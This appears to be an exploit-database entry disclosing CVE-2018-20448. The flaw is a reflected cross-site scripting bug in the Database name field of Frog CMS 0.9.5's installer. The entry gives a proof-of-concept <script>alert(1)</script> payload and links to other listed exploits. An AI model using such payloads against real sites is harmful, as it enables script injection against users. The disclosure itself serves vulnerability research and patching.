Frog cms 0.9.5 crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-01-02 | Type : webapps | Platform : php
This exploit / vulnerability Frog cms 0.9.5 crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Frog CMS 0.9.5 - Cross-Site Scripting
# Date: 2018-12-25
# Exploit Author:WangDudu
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Software Link: https://github.com/philippe/FrogCMS
# Version:0.9.5
# CVE :CVE-2018-20448

# The parameter under /install/index.php is that the Database name has reflective XSS
# 1 The Database name , username and password must be correct
# 2 You can use the exp:

<script>alert(1)</script>

Frog cms 0.9.5 crosssite scripting


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Frog cms 0.9.5 crosssite scripting Vulnerability / Exploit